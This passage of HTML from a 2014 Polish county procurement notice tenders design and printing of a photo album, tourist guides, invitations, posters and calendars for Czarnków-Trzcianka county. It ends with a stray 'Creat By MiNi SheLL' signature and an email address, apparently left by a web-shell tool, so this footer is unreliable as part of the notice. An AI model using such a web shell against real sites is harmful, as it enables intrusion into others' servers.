<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia wymienionego powyżej warunku na podstawie dokumentów przedłożonych przez Wykonawców metodą: spełnia; nie spełnia. Ocena: zamawiający uzna spełnienie warunku, gdy: oferent wykaże dysponowanie osobami zdolnymi do wykonania zamówienia. Dokumentem potwierdzającym spełnianie warunku będzie:
-oświadczenie o dysponowaniu  osobami zdolnymi do wykonania zmówienia -z wykorzystaniem wzoru -zał.2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia wymienionego powyżej warunku na podstawie dokumentów przedłożonych przez Wykonawców metodą: spełnia; nie spełnia. Ocena: zamawiający uzna spełnienie warunku, gdy: oferent wykaże, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
Dokumentem potwierdzającymi spełnianie warunku będzie:
-oświadczenie o sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia -z wykorzystaniem wzoru -zał.2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- w przypadku wykonawców występujących wspólnie pełnomocnictwo z art. 23 ust. 2 ustawy Prawo zamówień publicznych 
- lista podmiotów należących do tej samej grupy kapitałowej (załącznik)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę warunków realizacji umowy w zakresie ceny, terminów, zakresu zamówienia, przedmiotu zamówienia w tym zmiany urządzeń lub materiałów użytych do realizacji, ilości egzemplarzy w następujących sytuacjach: 
1) w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy;
2) w przypadku wystąpienia siły wyższej tj. niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego. Pod pojęciem siły wyższej na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne: a) o charakterze niezależnym od stron, b) którego nie można było przewidzieć na etapie postępowania o udzielenie zamówienia publicznego, c) którego nie można uniknąć, ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, d) którego nie można przypisać drugiej stronie.  Za siłę wyższą warunkują zmianę umowy uważać się będzie w szczególności: a) powódź, pożar, b) silne wiatry, obfite opady atmosferyczne, ekstremalny upał lub mróz, nietypowe dla obszaru, na którym realizowany jest przedmiot umowy, szczególnie w dłuższym okresie, c) inne zdarzenia związane z działaniem sił natury, nietypowe dla tego obszaru. Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych, których wystąpienie musi być normalnie brane pod uwagę przy składaniu ofert. Za siłę wyższą warunkującą zmianę umowy uważać się będzie również: a) zamieszki, strajki, ataki terrorystyczne, działania wojenne, b) nagłe i długotrwałe przerwy w dostawie energii elektrycznej, c) promieniowanie lub skażenia, d) nieprzewidziane uszkodzenie lub zniszczenie obiektu budowlanego, urządzenia technicznego lub systemu urządzeń technicznych powodujące przerwę w ich używaniu lub utratę ich właściwości, bez których zrealizowanie założonego pierwotnie celu umowy stało się niemożliwe, e) wystąpienie na obszarze, na którym realizowany jest przedmiot umowy zakażeń lub zachorowań na choroby zakaźne lub innych zjawisk związanych ze zdrowiem w liczbie większej niż zwykle albo wystąpienie zakażeń lub chorób zakaźnych dotychczas niewystępujących.
3)  zmiana stawki podatku VAT w przypadku jego umniejszenia,
4) zaistnienia wszystkich innych okoliczności mających wpływ na realizację zamówienia które nie zaistniały z winy zamawiającego lub wykonawcy,
5) wstrzymania usług lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego,
6) zaistnienia konieczności zwiększenia nakładu w związku z prowadzoną polityką promocji Powiatu,
7)  z przyczyn technologicznych, projektowych lub innych uzasadniających taką konieczność.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czarnkowsko-trzcianecki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul. Rybaki 3, 
64-700 Czarnków
-biuro 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2014 godzina 10:00, miejsce: Starostwo Powiatowe
ul. Rybaki 3, 
64-700 Czarnków
-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część nr 1: 
Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego - Album fotograficzny
Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich: Europa inwestująca w obszary wiejskie.
Zadanie współfinansowane ze środków Unii Europejskiej w ramach
osi 4 - LEADER Programu Rozwoju Obszarów Wiejskich na lata 2007-2013
Instytucja Zarządzająca PROW na lata 2007-2013 - Minister Rolnictwa i Rozwoju Wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego - Album fotograficzny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1: 
Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego - Album fotograficzny

TERMIN REALIZACJI:  luty-maj 2014

Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich: Europa inwestująca w obszary wiejskie.
Zadanie współfinansowane ze środków Unii Europejskiej w ramach
osi 4 - LEADER Programu Rozwoju Obszarów Wiejskich na lata 2007-2013
Instytucja Zarządzająca PROW na lata 2007-2013 - Minister Rolnictwa i Rozwoju Wsi

I.Informacje ogólne dotyczące zamówienia:

Zadnie to, jest zaplanowane do realizacji w ramach projektu pt. Powiat czarnkowsko - trzcianecki w czterech porach roku - dokumentacja i promocja walorów kulturowych i przyrodniczych, - współfinansowanego ze środków Unii Europejskiej w ramach działania  413 Wdrażanie lokalnych strategii rozwoju, osi 4 - LEADER Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w zakresie małych projektów.
Umowa przyznania pomocy nr 01163-6930-UM1540224(12 z dnia 29.11.2012 r.

II.Szczegółowy zakres prac

1.Zakres prac związany  z wydaniem albumu obejmuje: projekt graficzny, skład, druk wraz z czynnościami introligatorskimi, pakowania w papier pakowy, oraz dostarczenie przedmiotu zamówienia na własny koszt i na własne ryzyko do siedziby Zamawiającego.
2.Szczegółowy opis przedmiotu zamówienia (parametry techniczne):
1)Projekt graficzny
2)Format: 27cmx22cm - układ poziomy, albumowy
3)Ilość stron 72 strony + okładka
4)Papier wnętrze: kreda mat. 170g
5)Kolor 4(4 + lakier dyspersyjny na całości (mat.)
6)Wyklejka przednia i tylna druk 4(0
7)Oklejka na okładce kreda matowa 150g+folia matowa, druk 4(0
8)Oprawa twarda
9)Wersja polska, angielska, niemiecka- ilość strona taka sama we wszystkich wersjach.
10)Nakład:
a)Wersja polska: 1000szt.
b)Wersja niemiecka: 500szt.
c)Wersja angielska: 500sz.
3.Informacje ogólne związane z projektem graficznym:
1)Teksty, zdjęcia, loga w wersji elektronicznej dostarczy Zamawiający do 7 dni kalendarzowych od dnia zawarcia umowy, z zastrzeżeniem możliwości wymiany tekstu lub zdjęć w związku z korektami projektu graficznego.
2)Wersje językowe albumu są identyczne (wymienia się wyłącznie tekst, niekoniecznie czarny)
3)Wszelkie prace nad projektem Wykonawca zobowiązuje się  na bieżąco konsultować z Zamawiającym
4)Wykonawca przedstawi Zamawiającemu 4 istotnie różniące się propozycje projektów szaty graficznej, do wyboru jednego, w celu dalszej obróbki graficznej.
5)Obróbka graficzna wybranego projektu będzie odbywała się na bieżąco, obejmując nielimitowaną liczbę korekt.
6)Przedstawienie Zamawiającemu 4 istotnie różniących się propozycji projektów szaty graficznej powinno nastąpić do 10 dni roboczych, od momentu przekazania materiałów niezbędnych do wykonania projektu.
7)Przekazanie projektów do wyboru może odbywać się osobiście lub drogą mailową.
4.Wykonawca przeprowadza korektę tekstu.
5.Przed przystąpieniem do druku Wykonawca przedstawi Zamawiającemu
1)wzór kolorystyczny do akceptacji (proof) o łącznej powierzchni 8 formatek A4 zawierający okładkę i fragmenty stron wnętrza wskazane przez Zamawiającego.
2)wydrukowaną makietę albumu do akceptacji merytorycznej. 
6.Wykonawca nadaje publikacji numer ISBN.
7.Wraz z wydrukowanymi albumami Wykonawca przekaże Zamawiającemu na nośniku cyfrowym pliki otwarte albumu nadające się do edycji. 
8.Przygotowanie wydawnictwa w celu dostawy do zamawiającego: 
1)Pakowanie w papier pakowy min. 100g lub folię
2)Czytelne opisanie każdej paczki według następującego wzoru: tytuł wydawnictwa, wersja językowa, ilość sztuk, rok wydruku

III.Realizacja zamówienia
1.Termin realizacji: luty-maj 2014
2.Dostawa przedmiotu zamówienia nastąpi najpóźniej do dnia 30 maja 2014r. 
3.Wykonawca oświadcza, że album będący przedmiotem zamówienia nie narusza praw autorskich, praw pokrewnych oraz jakichkolwiek innych praw osób trzecich
4.W ramach wynagrodzenia Wykonawca przenosi na Zamawiającego autorskie prawa majątkowe do albumu.
5.Przeniesienie majątkowych praw autorskich następuje z chwilą zapłaty wynagrodzenia określonego w bez ograniczeń co do terytorium, czasu, liczby egzemplarzy, w zakresie poniższych pól eksploatacji:
1)do nieograniczonego w czasie korzystania i rozporządzania, w kraju i za granicą, 
na wszystkich polach eksploatacji określonych w art. 50 ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (Dz.U. 2006r. Nr 90, poz. 631 ze zm.), w szczególności na polach eksploatacji związanych z działalnością promocyjną, marketingową i reklamową, w tym prawa do:
a)wyłącznego używania i wykorzystania albumu,
b)wytwarzania, utrwalania i zwielokrotniania egzemplarzy albumu wszelkimi technikami, w tym techniką drukarską, reprograficzną, zapisu magnetycznego oraz techniką cyfrową, w szczególności ich zwielokrotniania poprzez dokonywanie zapisu na płytach DVD lub innych nośnikach.
c)publicznego wykonywania, wystawiania i wyświetlania albumu na wszelkich imprezach otwartych i zamkniętych, w tym publicznego udostępniania albumu w taki sposób, aby każdy mógł mieć do niego dostęp w miejscu i w czasie przez siebie wybranym,
d)emitowania albumu za pomocą wizji przewodowej, bezprzewodowej oraz za pośrednictwem satelity,
e)wydawania i rozpowszechniania albumu jako materiałów reklamowych,
f)wprowadzania albumu do pamięci komputera i umieszczania w sieci Internet, 
g)odtwarzania i reemitowania albumu
h)użyczania, najmu lub dzierżawy oryginału oraz innych egzemplarzy albumu.
6.Wykonawca ma prawo do umieszczania niniejszego albumu w swoim portfolio 
7.Jeżeli wykonawca wykona przedmiot umowy sprzeczny z umową, w sposób wadliwy (stwierdzona zostanie niska jakość druku, wady introligatorskie itp.), zaistnieją różnice między gotowym nakładem a materiałem po akceptacji  Zamawiający zastrzega sobie prawo do żądania usunięcia tych wad, wyznaczając  w tym celu Wykonawcy odpowiedni termin z zagrożeniem, że po bezskutecznym upływie wyznaczonego terminu może od umowy odstąpić i żądać zwrotu materiałów źródłowych.
8.Dodatkowy termin wyznaczony na usunięcie usterek przez Wykonawcę nie zwalnia go z nałożenia na Wykonawcę kar umownych związanych  z nieterminową realizacją zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego -  Pakiet przewodników turystycznych w obwolucie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.Informacje ogólne dotyczące zamówienia:

Na realizację tego zadnia został złożony wniosek o pomoc w ramach projektu pt. Weekend w powiecie czarnkowsko-trzcianeckim - promocja potencjału turystycznego powiatu, - współfinansowanego ze środków Unii Europejskiej w ramach działania  413 Wdrażanie lokalnych strategii rozwoju, osi 4 - LEADER Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w zakresie małych projektów.
Wniosek znajduje się w trakcie weryfikacji przez Urząd Marszałkowski Województwa Wielkopolskiego w Poznaniu.

II.Szczegółowy zakres prac

Zakres prac związany  z wydaniem pakietu przewodników turystycznych w obwolucie obejmuje: projekt graficzny, skład, druk wraz z czynnościami introligatorskimi, pakowania w papier pakowy, oraz dostarczenie przedmiotu zamówienia na własny koszt i na własne ryzyko do siedziby Zamawiającego.
1.Szczegółowy opis przedmiotu zamówienia (parametry techniczne):
1)Obwoluta:
a)Projekt graficzny i przygotowanie do druku
b)Format po zamknięciu: wysokość 220mm, szerokość 115mm, grubość 20 mm (grubość dostosowana do łącznej szerokości zawartości -przewodników turystycznych)
c)Obwoluta składa się z dwóch części -okładki i wysuwanej szufladki, która nie wysuwa się całkowicie, tylko blokuje się w jednym miejscu.
(przykład obwoluty w siedzibie Zamawiającego, dołączone zdjęcia - załącznik nr 6)
d)Kreda matowa 300g
e)Druk 4(4 CMYK
f)Folia matowa zewnętrznie
g)Sztancowanie, wykrojnik
h)Składanie i sklejanie pudelka
2)Komplet przewodników
a)Projekt i przygotowanie do druku
b)Ilość: 6 książeczek w komplecie
c)Format 110x215 mm (pion)
d)Objętość: 12 stron wnętrza + 6 stron okładki (okładka ze skrzydełkiem z tyłu zawijanym do środka)
e)Papier kreda matowa 170g na całość
f)Druk 4(4 CMYK
g)Szycie zeszytowe
3)Kompletowanie przewodników do obwoluty
4)Nakład 2000szt. kompletów
2.Wykonawca przekaże pliki przewodnika w wersji elektronicznej w celu zamieszczenia plików na stronie internetowej Zamawiającego w następujący sposób: pliki powinny być zapisane, na nośniku cyfrowym w formatach: pdf (łącznie 6 plików książeczek + 1 plik obwoluty) oraz jpg przy rozdzielczości min. 200dpi, taki sposób, że strony obwoluty i strony każdej z książeczki zapisane są w osobnych, tematycznych  folderach w celu ich łatwej identyfikacji.
3.Informacje ogólne związane z projektem graficznym:
1)Teksty, zdjęcia, loga w wersji elektronicznej dostarczy Zamawiający do 7 dni kalendarzowych od dnia zawarcia umowy, z zastrzeżeniem możliwości wymiany tekstu lub zdjęć w związku z korektami projektu graficznego.
2)Projekt obwoluty oraz wszystkich książeczek powinien być spójny, przygotowany wg jednej linii graficznej.
3)Wszelkie prace nad projektem Wykonawca zobowiązuje się  na bieżąco konsultować z Zamawiającym.
4)Wykonawca przedstawi Zamawiającemu 4 istotnie różniące się propozycje projektów szaty graficznej, do wyboru jednego w celu dalszej obróbki graficznej.
5)Obróbka graficzna wybranego projektu będzie odbywała się na bieżąco, obejmując nielimitowaną liczbę korekt.
6)Przedstawienie Zamawiającemu 4 istotnie różniących się propozycji projektów  szaty graficznej powinno nastąpić do 10 dni roboczych od momentu przekazania materiałów niezbędnych do wykonania projektu.
7)Przekazanie projektów do wyboru może odbywać się osobiście lub drogą mailową.
4.Po akceptacji projektu Wykonawca przedstawi Zamawiającemu makietę technologiczną całego pakietu.
5.Wykonawca przeprowadza korektę tekstu.
6.Przed przystąpieniem do druku Wykonawca przedstawi Zamawiającemu do akceptacji:
1)wzór kolorystyczny (proof) o łącznej powierzchni 8 formatek A4 zawierający fragmenty stron wnętrza i okładek wskazane przez Zamawiającego.
2)wydrukowaną makietę do akceptacji merytorycznej całego przewodnika
7.Wykonawca nadaje publikacji numer ISBN.
8.Wraz z wydrukowanymi przewodnikami Wykonawca przekaże Zamawiającemu 
na nośniku cyfrowym pliki otwarte przewodnika nadające się do edycji.
9.Przygotowanie wydawnictwa w celu dostawy do zamawiającego: 
1)Pakowanie w papier pakowy min. 100g lub folię skompletowane przewodniki w obwolucie tj.: w jednej obwolucie powinno znajdować się 6 pozycji o odmiennych tytułach.
2)Czytelne opisanie każdej paczki według następującego wzoru: tytuł wydawnictwa, ilość sztuk, rok wydruku.

III.Realizacja zamówienia
1.Termin realizacji: maj - październik 2014
2.Dostawa przedmiotu umowy nastąpi najpóźniej do 17.10.2014 
3.Wykonawca oświadcza, że przedmiot zamówienia nie narusza praw autorskich, praw pokrewnych oraz jakichkolwiek innych praw osób trzecich
4.W ramach wynagrodzenia Wykonawca przenosi na Zamawiającego autorskie prawa majątkowe do przedmiotu zamówienia.
5.Przeniesienie majątkowych praw autorskich następuje z chwilą zapłaty wynagrodzenia określonego §4 ust. 1 umowy w bez ograniczeń co do terytorium, czasu, liczby egzemplarzy, w zakresie poniższych pól eksploatacji:
1)do nieograniczonego w czasie korzystania i rozporządzania, w kraju i za granicą, na wszystkich polach eksploatacji określonych w art. 50 ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (Dz.U. 2006r. Nr 90, poz. 631 ze zm.), w szczególności na polach eksploatacji związanych z działalnością promocyjną, marketingową i reklamową, w tym prawa do:
a)wyłącznego używania i wykorzystania przedmiotu zamówienia,
b)wytwarzania, utrwalania i zwielokrotniania egzemplarzy przedmiotu zamówienia, wszelkimi technikami, w tym techniką drukarską, reprograficzną, zapisu magnetycznego oraz techniką cyfrową, w szczególności ich zwielokrotniania poprzez dokonywanie zapisu na płytach DVD lub innych nośnikach.
c)publicznego wykonywania, wystawiania i wyświetlania przedmiotu zamówienia na wszelkich imprezach otwartych i zamkniętych, w tym publicznego udostępniania przedmiotu zamówienia w taki sposób, aby każdy mógł mieć do niego dostęp w miejscu i w czasie przez siebie wybranym,
d)emitowania przedmiotu zamówienia za pomocą wizji przewodowej, bezprzewodowej oraz za pośrednictwem satelity,
e)wydawania i rozpowszechniania przedmiotu zamówienia jako materiałów reklamowych,
f)wprowadzania przedmiotu zamówienia do pamięci komputera i umieszczania w sieci Internet, 
g)odtwarzania i reemitowania przedmiotu zamówienia,
h)użyczania, najmu lub dzierżawy oryginału oraz innych egzemplarzy przedmiotu zamówienia.
6.Wykonawca ma prawo do umieszczania niniejszego przedmiotu zamówienia w swoim portfolio 
7.Jeżeli wykonawca wykona przedmiot umowy sprzeczny z umową, w sposób wadliwy (stwierdzona zostanie niska jakość druku, wady introligatorskie itp.), zaistnieją różnice między gotowym nakładem a materiałem po akceptacji  Zamawiający zastrzega sobie prawo do żądania usunięcia tych wad, wyznaczając  w tym celu Wykonawcy odpowiedni termin z zagrożeniem, że po bezskutecznym upływie wyznaczonego terminu może od umowy odstąpić i żądać zwrotu materiałów źródłowych.
8.Dodatkowy termin wyznaczony na usunięcie usterek przez Wykonawcę nie zwalnia go z nałożenia na Wykonawcę kar umownych związanych  z nieterminową realizacją zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego: pozostały pakiet materiałów promocyjno-informacyjnych: zaproszenia (4 wzory), plakat, kalendarz ścienny na 2015 r. i kalendarz podkładowy na 2015r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.Informacje ogólne dotyczące zamówienia:

Zadnie to, jest zaplanowane do realizacji w ramach zadań Wydziału Promocji Ochrony, Ochrony Zdrowia i Spraw Społecznych Starostwa Powiatowego w Czarnkowie. Na zakres prac zamówienia składają się: projekt graficzny, skład i druk wraz z czynnościami introligatorskimi następujących materiałów promocyjnych -informacyjnych :
zaproszenia - maksymalnie 4 wzory, każdy po 250szt. nakładu
plakat- 1 wzór, nakład 250szt. 
kalendarza ściennego na 2015 (1 wzór), nakład 500
kalendarza podkładowego na 2015r. (1 wzór) , nakład 200 

II.Szczegółowy zakres prac

1.Zakres prac związany z wykonaniem zaproszeń, plakatu, kalendarza  z obejmuje: projekt graficzny, skład, druk wraz z czynnościami introligatorskimi, pakowania w papier pakowy, oraz dostarczenie przedmiotu zamówienia na własny koszt i na własne ryzyko do siedziby Zamawiającego.
2.Szczegółowy opis przedmiotu zamówienia (parametry techniczne):
1)Zaproszenia DL (99 mmx210mm) - 1 wzór
a)Projekt, skład i druk
b)Nakład 250szt. dla 1 wzoru.
c)Format przed złożeniem (220mmx210mm) 
d)Format po złożeniu DL(99 mmx210mm), bigowany wzdłuż dłuższej krawędzi 
e)Papier ozdobny,  metalizowany 300 gram, np. typ Galaxy Metallic, kolor: vanilla cream (30) z oferty firmy Europapier, lub równoważny. 
f)Druk: 1+1 
g)Bigowanie i złożenie zaproszenia do formatu DL
2)Zaproszenia A6
a)Projekt, skład i druk
b)Nakład po 250szt.dla min. 1 wzoru.
c)Format przed złożeniem A5 (210 mmx148 mm lub 296 mm x105 mm)
d)Format po złożeniu A6 (ok 148mm × 105mm),pion lub poziom
e)Papier kreda mat. 300gram 
f)Druk: 4+4 CMYK
g)Bigowanie i złożenie zaproszenia do formatu A6
3)Plakat
a)Projekt, skład i druk
b)Nakład: 300szt.
c)Druk 4+0 CMYK
d)Format A2
e)Papier kreda mat. 150g
4)Kalendarz ścienny trójdzielny na 2015r.
a)Projekt, skład i druk
b)Nakład: 500szt.
c)Sztywna główka kaszerowana z folia matową
d)Druk: 4+0 CMYK
e)Uszlachetnianie -folia matowa
f)Plecki kartonowe
g)Kalendaria: biały, ecru
5)Kalendarz podkładowy na 2015r.
a)Projekt, skład i druk
b)Nakład 200 szt.
c)Format A2 (420cmx590cm)
d)Papier offset 80 gram
e)Klejony od dołu, wzdłuż dłuższego boku
f)26 kartek w bloku
g)Druk 4+0 CMYK
h)Plecki kartonowe
3.W okresie trwania umowy Zamawiający przewiduje do wykonania przez Wykonawcę nie mniej niż 1 wzór i nie więcej niż 3 wzory zaproszeń A6.
4.Informacje ogólne związane z projektem graficznym dotyczące każdego z przedmiotu zamówienia:
1)Teksty, loga w wersji elektronicznej dostarczy Zamawiający w terminie na min. 20 dni roboczych przed terminem dostawy towaru do wykonawcy.
2)Projekt kalendarza podkładowego i ściennego powinien być spójny, z wprowadzoną zasadą konsekwencji
3)Projekt jednego wzoru zaproszenia A6 i plakatu na tą sama uroczystość powinien być spójny, z wprowadzoną zasadą konsekwencji
4)Wszelkie prace nad projektem Wykonawca zobowiązuje się  na bieżąco konsultować z Zamawiającym
5)Wykonawca przedstawi Zamawiającemu 4 istotnie różniące się propozycje projektów szaty graficznej przedmiotu zamówienia, do wyboru jednego w celu dalszej obróbki graficznej.
6)Obróbka graficzna wybranego projektu będzie odbywała się na bieżąco, obejmując nielimitowaną liczbę korekt.
7)Przedstawienie Zamawiającemu 4 istotnie różniących się propozycji projektów  szaty graficznej powinno nastąpić do 5 dni roboczych od momentu przekazania materiałów niezbędnych do wykonania projektu.
8)Przekazanie projektów do wyboru może odbywać się osobiście lub drogą mailową.
5.Wykonawca oświadcza, że przedmiot zamówienia nie narusza praw autorskich, praw pokrewnych oraz jakichkolwiek innych praw osób trzecich.
6.Wykonawca przeprowadza korektę tekstu.
7.Każdorazowo, przed przystąpieniem do ostatecznego druku Wykonawca zobowiązany jest przedstawić Zamawiającemu do akceptacji merytorycznej zamówiony przedmiot.
8.Przygotowanie przedmiotu zamówienia w celu dostawy do zamawiającego: 
-pakowanie przedmiotu zamówienia w papier pakowy min. 100g lub folię.
9.Realizacja zamówienia
1)Okres realizacji zamówienia obejmuje czas od dnia podpisania umowy do 
8 grudnia 2014r. 
2)Zamawiający zobowiązuje powiadomić Wykonawcę o rozpoczęciu prac związanych z danym przedmiotem zamówienia na min. 20 dni roboczych przed terminem  dostawy towaru do Wykonawcy.
3)Dostawa ostatniego z przedmiotu umowy nastąpi najpóźniej do 8 grudnia 2014r.
4)Orientacyjny harmonogram prac:
a)Zaproszenia DL- 1 wzór - okres realizacji  listopad - grudzień 2014r., przy czym dostawa towaru nie powinna odbyć się później niż do 8 grudnia 2014r.
b)Zaproszenie A6 (1 wzór) i plakat - okres realizacji czerwiec-  sierpień 2014 r. przy czym dostawa towaru nie powinna odbyć się później niż do 14 sierpnia 2014 r. 
c)Kalendarz ścienny trójdzielny na 2015r., i kalendarz podkładowy na 2015r. - okres realizacji październik-listopad 2014 przy czym dostawa towaru nie powinna odbyć się później niż do 28 listopada 2014 r. 
5)Jeżeli wykonawca wykona przedmiot umowy sprzeczny z umową, w sposób wadliwy (stwierdzona zostanie niska jakość druku, wady introligatorskie itp.), zaistnieją różnice między gotowym nakładem a materiałem po akceptacji  Zamawiający zastrzega sobie prawo do żądania usunięcia tych wad, wyznaczając  w tym celu Wykonawcy odpowiedni termin z zagrożeniem, że po bezskutecznym upływie wyznaczonego terminu może od umowy odstąpić i żądać zwrotu materiałów źródłowych.
6)Dodatkowy termin wyznaczony na usunięcie usterek przez Wykonawcę nie zwalnia go z nałożenia na Wykonawcę kar umownych związanych  z nieterminową realizacją zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com